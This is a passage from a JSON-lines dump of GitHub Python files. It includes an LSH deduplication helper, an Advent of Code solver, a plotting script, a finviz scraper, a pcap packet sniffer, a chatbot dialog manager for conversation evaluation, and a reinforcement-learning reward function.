zip(record_ids, lsh_vals):\n idx = \"{}\".format(record_id)\n # update the hash document to whole corpus\n self.lsh_server.insert(idx, hash_val)\n return lsh_vals\n\n def query_duplicated_record(self, query):\n \"\"\"\n Query to LSH corpus for getting duplicated record Id\n Args:\n query (MinHash):\n\n Returns:\n result (list[int]): record Id\n\n \"\"\"\n result = self.lsh_server.query(query)\n result = [idx for idx in result]\n return sorted(result)\n\n def 
clustering(self, df):\n \"\"\"\n Query every document in corpus to find duplicated content\n\n Args:\n lsh_vals (list[MinHash]): list of LSH hash\n Returns:\n duplicated_ids (list[int]): list of duplicated record Ids\n\n \"\"\"\n # duplicated_ids = []\n # for idx in range(len(lsh_vals)):\n # result = self.query_duplicated_document(lsh_vals[idx])\n # if len(result) > 1:\n # duplicated_ids.append(result)\n #\n # return duplicated_ids\n print(df.head())\n","repo_name":"tanthml/atc","sub_path":"trajclus/lib/lsh_lib.py","file_name":"lsh_lib.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"27401743448","text":"#read input\r\nwith open(\"input1.txt\") as f:\r\n\r\n players = f.read().split(\"\\n\\n\")\r\n p1 = [int(n) for n in players[0].split(\"\\n\")[1:]]\r\n p2 = [int(n) for n in players[1].split(\"\\n\")[1:]]\r\n\r\n\r\n#play ball\r\ncurr_round = 0\r\nwhile len(p1) > 0 and len(p2) > 0:\r\n curr_round += 1\r\n\r\n print(\"\\n-- Round \" + str(curr_round) + \" --\")\r\n print(\"Player 1's deck: \" + str(p1))\r\n print(\"Player 2's deck: \" + str(p2))\r\n \r\n\r\n c1, c2 = p1.pop(0), p2.pop(0)\r\n\r\n print(\"Player 1 plays: \" + str(c1))\r\n print(\"Player 2 plays: \" + str(c2))\r\n if c1 > c2:\r\n winner = p1\r\n print(\"Player 1 wins the round!\")\r\n else: #we don't account for draws yet\r\n winner = p2\r\n print(\"Player 2 wins the round!\")\r\n\r\n winner.append(max(c1, c2))\r\n winner.append(min(c1, c2))\r\n\r\n\r\n#print final score\r\nscore = 0\r\nfor i, c in enumerate(winner):\r\n score += (len(winner) - i) * c\r\n\r\nprint(\"\\n\\nFinal Score: \" + str(score))\r\n \r\n","repo_name":"dreary-dugong/puzzles","sub_path":"Advent of Code/2020/day 22/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20142313010","text":"import os, sys\nimport pickle\nimport numpy as np\nimport argparse\nimport time\nimport glob\n\nimport matplotlib\nimport matplotlib.ticker as ticker\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.dates as md\n\n\nif __name__ == '__main__':\n\n ## init a parser\n parser = argparse.ArgumentParser(description='data plot')\n parser.add_argument('--output_dir', type=str, default='output')\n parser.add_argument('--alg_output_dir', type=str, default='output')\n parser.add_argument('--exp_name', type=str, default='acon2')\n parser.add_argument('--fig_root', type=str, default='output/figs')\n # parser.add_argument('--style', type=str, nargs='+', default=['-k', '-r', '-b'])\n parser.add_argument('--fontsize', type=int, default=15)\n # parser.add_argument('--data_start_idx', type=int, default=0)\n # parser.add_argument('--data_end_idx', type=int, default=2000)\n parser.add_argument('--y_min', type=float, default=0.0)\n parser.add_argument('--y_max', type=float, default=0.03)\n parser.add_argument('--tag', type=str, default='')\n parser.add_argument('--n_sources', type=int, default=3)\n #parser.add_argument('--alpha_list', type=str, nargs='+', default=['0d03', '0d15', '0d3'])\n parser.add_argument('--K', type=int, default=3)\n parser.add_argument('--alpha_list', type=str, nargs='+', default=['0.01', '0.001'])\n parser.add_argument('--alpha_color', type=str, nargs='+', default=['green', 'red', 'blue'])\n parser.add_argument('--duration', type=int, default=3600)\n 
parser.add_argument('--start_idx', type=int, default=0) # skip the first junk part \n\n args = parser.parse_args()\n \n # init\n #fn_out = os.path.join(args.fig_root, args.exp_name, f'plot_error_var_K_{args.K}_alpha{\"_\" if args.tag else \"\"}{args.tag}')\n fn_out = os.path.join(args.fig_root, args.exp_name, f'plot-error-var-K-{args.K}-alphas')\n os.makedirs(os.path.dirname(fn_out), exist_ok=True)\n\n # read data\n error_min_list = []\n error_max_list = []\n error_mean_list = []\n alpha_list = []\n alpha_color_list = []\n t_list = []\n for alpha_color, alpha_str in zip(args.alpha_color, args.alpha_list):\n data_path_list = glob.glob(os.path.join(args.alg_output_dir, f'{args.exp_name}_K_{args.K}_alpha_{alpha_str.replace(\".\", \"d\")}_iter_*_duration_{args.duration}', 'data.pk'))\n print(data_path_list)\n error_stack = []\n for p in data_path_list:\n data = pickle.load(open(p, 'rb'))\n error = [d['miscoverage_cons'] for d in data]\n error_stack.append(error)\n print(p, len(error))\n if len(error_stack) == 0:\n continue\n len_min = min([len(error) for error in error_stack])\n error_stack = [error[:len_min] for error in error_stack]\n error_stack = np.array(error_stack)\n error_min = np.amin(error_stack, 0)\n error_max = np.amax(error_stack, 0)\n error_mean = np.mean(error_stack, 0)\n t = np.arange(len(error_min))\n t_list.append(t)\n error_min_list.append(error_min)\n error_max_list.append(error_max)\n error_mean_list.append(error_mean)\n alpha_list.append(alpha_str)\n alpha_color_list.append(alpha_color)\n\n \n \n with PdfPages(fn_out + '.pdf') as pdf:\n hs = []\n plt.figure(1)\n\n # pseudo-miscoverage rate range\n for error_min, error_max, error_mean, t, alpha_str, color in zip(error_min_list, error_max_list, error_mean_list, t_list, alpha_list, alpha_color_list):\n\n error_min = error_min[args.start_idx:]\n error_max = error_max[args.start_idx:]\n error_mean = error_mean[args.start_idx:]\n t = t[args.start_idx:]\n\n alpha_acon2 = float(alpha_str)\n\n # mean\n h = plt.plot(t, error_mean, color=color, linewidth=2)\n \n # min/max\n h = plt.fill_between(t, error_max, error_min, color=color, alpha=0.2, label=rf'ACC with $\\alpha={alpha_acon2}$')\n hs.append(h)\n\n # alpha\n h = plt.hlines(alpha_acon2, min(t), max(t), colors='k', linestyles='solid', label=rf'$\\alpha={alpha_acon2}$')\n\n \n # beautify\n plt.ylim((args.y_min, args.y_max))\n plt.xlabel('# observations', fontsize=args.fontsize)\n plt.ylabel(f'pseudo-miscoverage rate', fontsize=args.fontsize)\n plt.grid('on')\n plt.yticks(list(set(list(plt.yticks()[0]) + [float(e) for e in args.alpha_list])))\n plt.legend(handles=hs, fontsize=args.fontsize)\n plt.savefig(fn_out+'.png', bbox_inches='tight')\n pdf.savefig(bbox_inches='tight')\n\n print(fn_out)\n","repo_name":"sslab-gatech/ACon2","sub_path":"solidity/plots/plot_error_var_alpha.py","file_name":"plot_error_var_alpha.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"69891541045","text":"#import\ntry: \n import urllib3\n from bs4 import BeautifulSoup\nexcept ImportError:\n print (\"Error importing\")\n\n\nhttp = urllib3.PoolManager()\n\ndef get_url(url, header):\n response = http.request('GET', url, headers=header)\n\n if response.status == 503:\n print (response.status)\n if response.status == 200:\n # return response object\n return (response)\n\ndef struct_response(response):\n response_body = BeautifulSoup(get_url_response.data, features=\"html.parser\")\n return 
(response_body)\n\ndef get_tickers(html):\n array = [1,2,3]\n return (array)\n\nsite_url = 'https://finviz.com/'\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0 '}\n\nget_url_response = get_url(site_url, header)\nhtml_struct = struct_response(get_url_response)\nticker_array = get_tickers(html_struct)\n\n# response_status = get_url_response.status\n# response_headers = get_url_response.headers\n\n# print (html_struct)\nprint (ticker_array)\n","repo_name":"jaypestillo/soldi_puliti","sub_path":"finviz_functions.py","file_name":"finviz_functions.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1791141157","text":"import threading\n\nimport pcappy\nimport parser.packet as packet_parser\n\nMAX_PACKET_SIZE=65535\nTIMEOUT=1000\n\nclass Sniffer(threading.Thread):\n def __init__(self, interface, snaplen, promisc, ms):\n threading.Thread.__init__(self)\n self.interface = interface\n self.snaplen = snaplen\n self.promisc = promisc\n self.ms = ms\n self.d = {}\n self.capture = None\n\n def run(self):\n self.capture = pcappy.open_live(self.interface, snaplen=self.snaplen,\n promisc=self.promisc, to_ms=self.ms)\n self.capture.loop(-1, self._parse_packet, self.d)\n\n def stop(self):\n self.capture.breakloop()\n\n def _parse_packet(self, d, hdr, data):\n ts = float(str(hdr.ts[1]) + \".\" + str(hdr.ts[0]))\n packet = packet_parser.Packet(ts, data)\n if packet:\n print(packet.to_json())\n","repo_name":"kbrebanov/sniffy","sub_path":"sniffer/sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70824282807","text":"import asyncio\r\nimport enum\r\nimport itertools\r\nimport logging\r\nimport random\r\nfrom uuid import uuid4\r\nfrom datetime import datetime, timedelta\r\nfrom numbers import Number\r\nfrom typing import Dict, Union, List, Optional\r\n\r\nfrom apscheduler.job import Job\r\nfrom apscheduler.jobstores.base import JobLookupError\r\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\r\nfrom apscheduler.schedulers.base import BaseScheduler\r\nfrom mongoengine import ValidationError, FieldDoesNotExist, QuerySet\r\n\r\nfrom convai import run_sync_in_executor\r\nfrom convai.conversation_gateways import AbstractGateway, AbstractDialogHandler, HumansGateway, BotsGateway\r\nfrom convai.exceptions import UserBannedError, SimultaneousDialogsError\r\nfrom model import User, Bot, BannedPair, Conversation, ConversationPeer, PersonProfile, Complaint, Settings\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\nclass DialogManager(AbstractDialogHandler):\r\n class EvaluationState(enum.Flag):\r\n NONE = 0\r\n SCORE_GIVEN = enum.auto()\r\n PROFILE_SELECTED = enum.auto()\r\n COMPLETE = SCORE_GIVEN | PROFILE_SELECTED\r\n\r\n _evaluations: Dict[int, List[EvaluationState]]\r\n _dialog_timeout_handlers: Dict[int, Job]\r\n _active_dialogs: Dict[int, Conversation]\r\n _lobby: Dict[User, Job]\r\n\r\n humans_gateway: HumansGateway\r\n bots_gateway: BotsGateway\r\n\r\n dialog_options: dict\r\n evaluation_options: dict\r\n\r\n dialog_eval_min: int\r\n dialog_eval_max: int\r\n length_threshold: int\r\n inactivity_timeout: Number\r\n human_bot_ratio: float\r\n max_time_in_lobby: Number\r\n\r\n def __init__(self, bots_gateway: BotsGateway, humans_gateway: HumansGateway, dialog_options: dict,\r\n evaluation_options: dict, 
scheduler: BaseScheduler = None):\r\n \"\"\"\r\n Dialog manager is responsible for handling conversations. Including matching with human and bot peers, dialog \r\n setup, dialog evaluation, etc.\r\n\r\n :param bots_gateway: An object capable of handling system-to-bot communication\r\n :param humans_gateway: An object capable of handling system-to-human communication\r\n :param dialog_options: dialog options\r\n :param evaluation_options: dialog evaluation options\r\n :param scheduler: custom non-blocking scheduler object which conforms to the interface of\r\n apscheduler.schedulers.base.BaseScheduler. Default value is BackgroundScheduler().\r\n \"\"\"\r\n self.humans_gateway = humans_gateway\r\n self.bots_gateway = bots_gateway\r\n self.scheduler = scheduler if scheduler is not None else AsyncIOScheduler()\r\n\r\n self.dialog_options = dialog_options\r\n self.evaluation_options = evaluation_options\r\n\r\n self.dialog_eval_min = evaluation_options['evaluation_score_from']\r\n self.dialog_eval_max = evaluation_options['evaluation_score_to']\r\n self.length_threshold = dialog_options['max_length']\r\n self.inactivity_timeout = dialog_options['inactivity_timeout']\r\n self.human_bot_ratio = dialog_options['human_bot_ratio']\r\n self.max_time_in_lobby = dialog_options['max_time_in_lobby']\r\n\r\n self._lobby = {}\r\n self._active_dialogs = {}\r\n self._evaluations = {}\r\n self._dialog_timeout_handlers = {}\r\n\r\n self.scheduler.start()\r\n\r\n async def on_human_initiated_dialog(self, user: User):\r\n log.info(f'human initiated dialog: {user.user_key}')\r\n if user.banned:\r\n raise UserBannedError(\"Banned users are not allowed to start dialogs\")\r\n active_dialogs_peers = itertools.chain(*map(lambda c: (c.participant1, c.participant2),\r\n self._active_dialogs.values()))\r\n if user in self._lobby or user in map(lambda p: p.peer, active_dialogs_peers):\r\n raise SimultaneousDialogsError(\"Starting multiple dialogs simultaneously is prohibited\")\r\n\r\n if random.random() > self.human_bot_ratio:\r\n log.info(f'bot peer selected')\r\n await self._start_dialog_with_bot(user)\r\n return\r\n if await self._try_start_dialog_with_human(user):\r\n return # Human peer has been found in the lobby and the dialog started right away\r\n log.info(f'no humans found in lobby. Setting up the timer')\r\n\r\n # No waiting human peers are available. Putting user in lobby for \"max_time_in_lobby\" seconds and starting\r\n # the dialog with bot in the case of timeout\r\n event = self._schedule(self.max_time_in_lobby, self._start_dialog_with_bot, argument=(user,))\r\n self._lobby[user] = event\r\n\r\n async def on_message_received(self, conversation_id: int, sender: Union[Bot, User], text: str,\r\n time: datetime) -> int:\r\n log.info(f'message received for conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, sender)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id in self._evaluations:\r\n raise ValueError('Conversation is finished. 
Only evaluation is allowed')\r\n\r\n msg = conversation.add_message(text=text, sender=sender, time=time)\r\n\r\n receiver = next((p.peer for p in conversation.participants if p.peer != sender), None)\r\n if receiver is None:\r\n raise RuntimeError('Could not find a receiver for the message')\r\n\r\n await self._gateway_for_peer(receiver).send_message(conversation_id, msg.msg_id, msg.text, receiver)\r\n\r\n if len(conversation.messages) >= self.length_threshold:\r\n log.info(f'conversation length threshold reached. Finishing the conversation')\r\n await self.trigger_dialog_end(conversation_id, sender)\r\n else:\r\n self._reset_inactivity_timer(conversation_id)\r\n\r\n return msg.msg_id\r\n\r\n async def on_message_evaluated(self, conversation_id: int, evaluator: Union[Bot, User], score: int,\r\n msg_id: int = None):\r\n log.info(f'message evaluated in conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n if score > 1 or score < 0:\r\n raise ValueError('Score should be within a range [0, 1]')\r\n\r\n if msg_id is None:\r\n msg_id = next((m.msg_id for m in conversation.messages[::-1] if m.sender != evaluator), -1)\r\n msg = next((m for m in conversation.messages if m.msg_id == msg_id), None)\r\n\r\n if msg is None:\r\n raise ValueError('Could not find a message with id {}'.format(msg_id))\r\n\r\n if msg.sender == evaluator:\r\n raise ValueError('Could not find evaluate own messages')\r\n\r\n msg.evaluation_score = score\r\n\r\n async def switch_to_next_topic(self, conversation_id: int, peer: User) -> int:\r\n log.info('switching to the next conversation topic')\r\n self._validate_conversation_and_peer(conversation_id, peer)\r\n conversation: Conversation = self._active_dialogs[conversation_id]\r\n\r\n messages_to_switch_topic_left = conversation.next_topic()\r\n\r\n if messages_to_switch_topic_left == 0:\r\n index = conversation.active_topic_index\r\n msg = conversation.add_message(text=f'Switched to topic with index {index}', sender=peer, system=True)\r\n\r\n for conv_peer in conversation.participants:\r\n kwargs = {}\r\n if self.dialog_options['use_images'] and isinstance(conv_peer.peer, User):\r\n kwargs['image'] = conv_peer.assigned_profile.get_topic_image(index)\r\n if isinstance(conv_peer.peer, Bot):\r\n kwargs['conv_id'] = conversation_id\r\n kwargs['msg_id'] = msg.msg_id\r\n await self._gateway_for_peer(conv_peer.peer).on_topic_switched(conv_peer.peer,\r\n conv_peer.assigned_profile.topics[index],\r\n **kwargs)\r\n\r\n return messages_to_switch_topic_left\r\n\r\n async def trigger_dialog_end(self, conversation_id: int, peer: Union[Bot, User]):\r\n log.info(f'end of conversation {conversation_id} triggered')\r\n self._validate_conversation_and_peer(conversation_id, peer)\r\n\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n for participant in conversation.participants:\r\n if participant.peer == peer:\r\n participant.triggered_dialog_end = True\r\n\r\n await self._initiate_final_evaluation(conversation_id)\r\n\r\n async def evaluate_dialog(self, conversation_id: int, evaluator: Union[User, Bot], score: Optional[int]):\r\n log.info(f'conversation {conversation_id} evaluated')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id not in self._evaluations:\r\n raise ValueError('Conversation is not finished yet')\r\n\r\n peer_idx = 0 if conversation.participant1.peer == 
evaluator else 1\r\n\r\n if score is not None:\r\n if score > self.dialog_eval_max or score < self.dialog_eval_min:\r\n raise ValueError('Score should be within a range [{}, {}]'.format(self.dialog_eval_min,\r\n self.dialog_eval_max))\r\n\r\n conversation_peer = next((p for p in conversation.participants if p.peer == evaluator))\r\n\r\n conversation_peer.dialog_evaluation_score = score\r\n\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.SCORE_GIVEN\r\n\r\n if not self.dialog_options['assign_profile'] or not self.evaluation_options['guess_profile']:\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.PROFILE_SELECTED\r\n\r\n await self._handle_evaluation_state(conversation_id)\r\n\r\n async def select_other_peer_profile(self, conversation_id: int, evaluator: Union[User, Bot],\r\n profile_idx: Optional[int]):\r\n log.info(f'partner profile selected in conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id not in self._evaluations:\r\n raise ValueError('Conversation is not finished yet')\r\n\r\n peer_idx = 0 if conversation.participants[0].peer == evaluator else 1\r\n\r\n evaluator_peer = next((p for p in conversation.participants if p.peer == evaluator))\r\n\r\n if profile_idx is not None:\r\n if profile_idx < 0 or profile_idx >= len(evaluator_peer.other_peer_profile_options):\r\n raise ValueError('Selected profile was not an option')\r\n\r\n evaluator_peer.other_peer_profile_selected = evaluator_peer.other_peer_profile_options[profile_idx]\r\n\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.PROFILE_SELECTED\r\n await self._handle_evaluation_state(conversation_id)\r\n\r\n async def select_other_peer_profile_sentence(self, conversation_id: int, evaluator: Union[User, Bot],\r\n sentence: str, sentence_idx: Optional[int] = None):\r\n log.info(f'partner profile sentence selected in conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id not in self._evaluations:\r\n raise ValueError('Conversation is not finished yet')\r\n\r\n peer_idx = 0 if conversation.participants[0].peer == evaluator else 1\r\n\r\n evaluator_peer = next((p for p in conversation.participants if p.peer == evaluator))\r\n other_peer = next((p for p in conversation.participants if p.peer != evaluator))\r\n\r\n if sentence_idx is None:\r\n sentence_idx = len(evaluator_peer.other_peer_profile_selected_parts)\r\n\r\n nones_to_append = sentence_idx - len(evaluator_peer.other_peer_profile_selected_parts) + 1\r\n\r\n evaluator_peer.other_peer_profile_selected_parts += [None] * nones_to_append\r\n evaluator_peer.other_peer_profile_selected_parts[sentence_idx] = sentence\r\n\r\n selected_parts = [x for x in evaluator_peer.other_peer_profile_selected_parts if x is not None]\r\n\r\n if len(selected_parts) == len(other_peer.assigned_profile.persona):\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.PROFILE_SELECTED\r\n await self._handle_evaluation_state(conversation_id)\r\n\r\n async def complain(self, conversation_id: int, complainer: User) -> bool:\r\n log.info(f'complaint about conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, complainer)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if len(conversation.messages) == 0:\r\n 
return False\r\n\r\n complain_to = [x.peer for x in conversation.participants if x.peer != complainer][0]\r\n\r\n complaint = Complaint(complainer=complainer,\r\n complain_to=complain_to,\r\n conversation=conversation)\r\n\r\n def save_complaint_and_dialog():\r\n conversation.save()\r\n complaint.save()\r\n\r\n await run_sync_in_executor(save_complaint_and_dialog)\r\n return True\r\n\r\n async def _handle_evaluation_state(self, conversation_id: int):\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n def check(i):\r\n return isinstance(conversation.participants[i].peer, Bot) or \\\r\n self._evaluations[conversation_id][i] == self.EvaluationState.COMPLETE\r\n\r\n completed = all(map(check, range(2)))\r\n\r\n if completed:\r\n await self._cleanup_conversation(conversation_id)\r\n\r\n async def dialog_is_active(self, conversation_id: int) -> bool:\r\n return conversation_id in self._active_dialogs\r\n\r\n def _validate_conversation_and_peer(self, conversation_id: int, peer: Union[Bot, User]):\r\n log.debug(f'validating conversation and peer: {conversation_id}, {peer}')\r\n if conversation_id not in self._active_dialogs:\r\n raise ValueError('There is no active conversation with id {}'.format(conversation_id))\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if not any(map(lambda p: p.peer == peer, conversation.participants)):\r\n raise ValueError('Peer is not a part of the conversation')\r\n\r\n def _schedule(self, delay, action, argument=(), kwargs=None):\r\n if kwargs is None:\r\n kwargs = {}\r\n job = self.scheduler.add_job(action,\r\n 'date',\r\n args=argument,\r\n kwargs=kwargs,\r\n run_date=datetime.now() + timedelta(seconds=delay))\r\n return job\r\n\r\n @staticmethod\r\n def _unschedule_safe(job):\r\n try:\r\n job.remove()\r\n except JobLookupError:\r\n pass\r\n\r\n def _unschedule_lobby_timeout(self, user: User):\r\n if user in self._lobby:\r\n self._unschedule_safe(self._lobby[user])\r\n del self._lobby[user]\r\n\r\n def _unschedule_inactivity_timer(self, conversation_id):\r\n if conversation_id in self._dialog_timeout_handlers:\r\n self._unschedule_safe(self._dialog_timeout_handlers[conversation_id])\r\n del self._dialog_timeout_handlers[conversation_id]\r\n\r\n def _reset_inactivity_timer(self, conversation_id: int):\r\n log.debug(f'inactivity timer reset for conversation {conversation_id}')\r\n self._unschedule_inactivity_timer(conversation_id)\r\n\r\n event = self._schedule(self.inactivity_timeout, self._handle_conversation_timeout, argument=(conversation_id,))\r\n self._dialog_timeout_handlers[conversation_id] = event\r\n\r\n async def _try_start_dialog_with_human(self, user: User):\r\n log.info(f'trying to start human-human dialog')\r\n if len(self._lobby) == 0:\r\n log.info(f'failed to start human-human dialog. 
The lobby is empty')\r\n return False\r\n\r\n log.info(f'human partner found in the lobby')\r\n\r\n peer = random.choice(list(self._lobby.keys()))\r\n self._unschedule_lobby_timeout(peer)\r\n await self._instantiate_dialog(user, peer)\r\n return True\r\n\r\n async def _start_dialog_with_bot(self, user: User):\r\n log.info(f'starting dialog with bot')\r\n self._unschedule_lobby_timeout(user)\r\n if user.assigned_test_bot:\r\n bots = await run_sync_in_executor(Bot.objects, banned=False, token=user.assigned_test_bot.token)\r\n else:\r\n bots = await run_sync_in_executor(Bot.objects, banned=False)\r\n bots_count = await run_sync_in_executor(bots.count)\r\n if self.bots_gateway is None or bots_count == 0:\r\n log.warning(f'no bots found or bots gateway is None')\r\n await self.humans_gateway.on_conversation_failed(user,\r\n AbstractGateway.ConversationFailReason.PEER_NOT_FOUND)\r\n return\r\n found = False\r\n bot = None # Silence PyCharm warning\r\n while not found:\r\n bot = await run_sync_in_executor(lambda: bots[random.randrange(bots_count)])\r\n found = (await run_sync_in_executor(lambda: BannedPair.objects(user=user, bot=bot).count())) == 0\r\n await self._instantiate_dialog(user, bot)\r\n\r\n def _gateway_for_peer(self, peer: Union[User, Bot, ConversationPeer]):\r\n if isinstance(peer, ConversationPeer):\r\n return self._gateway_for_peer(peer.peer)\r\n\r\n if not isinstance(peer, User) and not isinstance(peer, Bot):\r\n raise RuntimeError('Unexpected peer class: {}. Only {} are supported'.format(type(peer), [User, Bot]))\r\n return self.humans_gateway if isinstance(peer, User) else self.bots_gateway\r\n\r\n async def _instantiate_dialog(self, user: User, peer: Union[User, Bot]):\r\n log.info(f'instantiating the dialog')\r\n\r\n conversation = Conversation(participant1=ConversationPeer(peer=user, peer_conversation_guid=uuid4().__str__()),\r\n participant2=ConversationPeer(peer=peer, peer_conversation_guid=uuid4().__str__()))\r\n\r\n tags_set: QuerySet = Settings.objects(name='tags')\r\n active_tags = tags_set.first().value if tags_set.count() else []\r\n\r\n if active_tags:\r\n profiles: QuerySet = await run_sync_in_executor(PersonProfile.objects(tags__in=active_tags))\r\n if profiles.count() == 0:\r\n log.warning(f'Not found any profiles with tags: {active_tags}')\r\n profiles: QuerySet = await run_sync_in_executor(PersonProfile.objects)\r\n else:\r\n profiles: QuerySet = await run_sync_in_executor(PersonProfile.objects)\r\n\r\n first_profile = None\r\n linked_profile_uuid = None\r\n\r\n for p in conversation.participants:\r\n if first_profile is None:\r\n p.assigned_profile = first_profile = random.choice(profiles)\r\n linked_profile_uuid = first_profile.link_uuid\r\n\r\n else:\r\n # profiles assignment order:\r\n # other profile from the same linked group || profile with unmatching sentences || same profile\r\n second_profile = random.choice(profiles(id__ne=first_profile.id, link_uuid=linked_profile_uuid) or\r\n (profiles(persona__ne=first_profile.persona) or [first_profile]))\r\n\r\n p.assigned_profile = second_profile\r\n\r\n while True:\r\n conv_id = random.getrandbits(31)\r\n if conv_id not in self._active_dialogs and \\\r\n await run_sync_in_executor(lambda: Conversation.objects(conversation_id=conv_id).count()) == 0:\r\n break\r\n conversation.conversation_id = conv_id\r\n\r\n conversation.messages_to_switch_topic = self.dialog_options['n_messages_to_switch_topic']\r\n conversation.reset_topic_switch_counter()\r\n\r\n self._active_dialogs[conv_id] = conversation\r\n\r\n for p in 
conversation.participants:\r\n target_gateway = self._gateway_for_peer(p)\r\n await target_gateway.start_conversation(conv_id, p.peer, p.assigned_profile, p.peer_conversation_guid)\r\n\r\n self._reset_inactivity_timer(conv_id)\r\n\r\n async def _handle_conversation_timeout(self, conversation_id: int):\r\n log.info(f'dialog inactivity timeout: {conversation_id}')\r\n if conversation_id in self._evaluations:\r\n await self._cleanup_conversation(conversation_id)\r\n else:\r\n await self._initiate_final_evaluation(conversation_id)\r\n\r\n async def _cleanup_conversation(self, conversation_id: int):\r\n log.info(f'cleaning up the conversation {conversation_id}')\r\n conversation = self._active_dialogs[conversation_id]\r\n all_gateways = set(map(self._gateway_for_peer, conversation.participants))\r\n\r\n await asyncio.gather(*[gw.finish_conversation(conversation_id) for gw in all_gateways], return_exceptions=True)\r\n try:\r\n await run_sync_in_executor(conversation.save)\r\n except ValidationError:\r\n log.warning('Empty conversation. Not saving')\r\n\r\n self._unschedule_inactivity_timer(conversation_id)\r\n del self._active_dialogs[conversation_id]\r\n del self._evaluations[conversation_id]\r\n\r\n async def _initiate_final_evaluation(self, conversation_id: int):\r\n log.info(f'initiating final evaluation for conversation {conversation_id}')\r\n conversation = self._active_dialogs[conversation_id]\r\n self._reset_inactivity_timer(conversation_id)\r\n\r\n self._evaluations[conversation_id] = [self.EvaluationState.NONE] * 2\r\n\r\n db_profiles = await run_sync_in_executor(PersonProfile.objects)\r\n\r\n to_await = []\r\n for i, p in enumerate(conversation.participants):\r\n true_profile: PersonProfile = conversation.participants[1 - i].assigned_profile\r\n random_profile: PersonProfile = random.choice(db_profiles(persona__ne=true_profile.persona) or\r\n [true_profile])\r\n\r\n profiles = [true_profile, random_profile]\r\n random.shuffle(profiles)\r\n\r\n p.other_peer_profile_options = profiles\r\n\r\n to_await.append(\r\n self._gateway_for_peer(p.peer).start_evaluation(conversation_id,\r\n p.peer,\r\n profiles,\r\n true_profile,\r\n range(self.dialog_eval_min, self.dialog_eval_max + 1)))\r\n\r\n await asyncio.gather(*to_await)\r\n","repo_name":"deeppavlov/convai_router_bot","sub_path":"convai/dialog_manager.py","file_name":"dialog_manager.py","file_ext":"py","file_size_in_byte":23245,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"23848194269","text":"'''\n@author : CodePerfectPlus\n@Topic : Generator\n'''\n\n\nright_combination = (2,3,5)\n\nfor c1 in range(10):\n for c2 in range(10):\n for c3 in range(10):\n if (c1,c2,c3) == right_combination:\n print('Found The Combination :{}'.format((c1,c2,c3)))\n","repo_name":"codeperfectplus/Pythonite","sub_path":"Python basic/generator_function.py","file_name":"generator_function.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"28050267480","text":"\ndef compute_reward(observations, done):\n # The sign depend on its function.\n total_reward = 0\n \n # # create and update from last position\n # last_position = []\n # last_position.append(self.last_pose.position.x)\n # last_position.append(self.last_pose.position.y)\n # last_position.append(self.last_pose.position.z)\n\n # # create and update current position\n # current_position = []\n # 
current_position.append(self.current_pose.position.x)\n # current_position.append(self.current_pose.position.y)\n # current_position.append(self.current_pose.position.z)\n\n # # create the distance btw the two last vector\n # distance_before_move = self.distance_between_vectors(last_position, self.target_position)\n # distance_after_move = self.distance_between_vectors(current_position, self.target_position)\n\n last_object_position = [self.last_observation[10], self.last_observation[11], self.last_observation[12]]\n current_object_position = [self.current_observation[10], self.current_observation[11], self.current_observation[12]]\n\n # create the distance btw the two last vector\n distance_before_move = self.distance_between_vectors(last_object_position, self.target_position)\n distance_after_move = self.distance_between_vectors(current_object_position, self.target_position)\n \n # Give the reward\n if self.out_workspace:\n total_reward -= 20\n else:\n if done:\n total_reward += 1500\n else:\n print(\"Distance object to target: \", distance_after_move - distance_before_move)\n if(distance_after_move - distance_before_move < 0): # before change... >\n # print(\"right direction\")\n total_reward += 2\n total_reward += (1*distance_after_move)\n #if object didnt move.. bad reward\n elif (abs(distance_after_move - distance_before_move) < 0.001):\n total_reward -= 15.0\n \n else:\n # print(\"wrong direction\")\n total_reward -= 2.0 # 1.0\n total_reward -= (1*distance_after_move*8) # 1.0\n \n \n # print(\"REWARD: \", distance_after_move )\n # Time punishment\n total_reward -= 1.0\n\n return 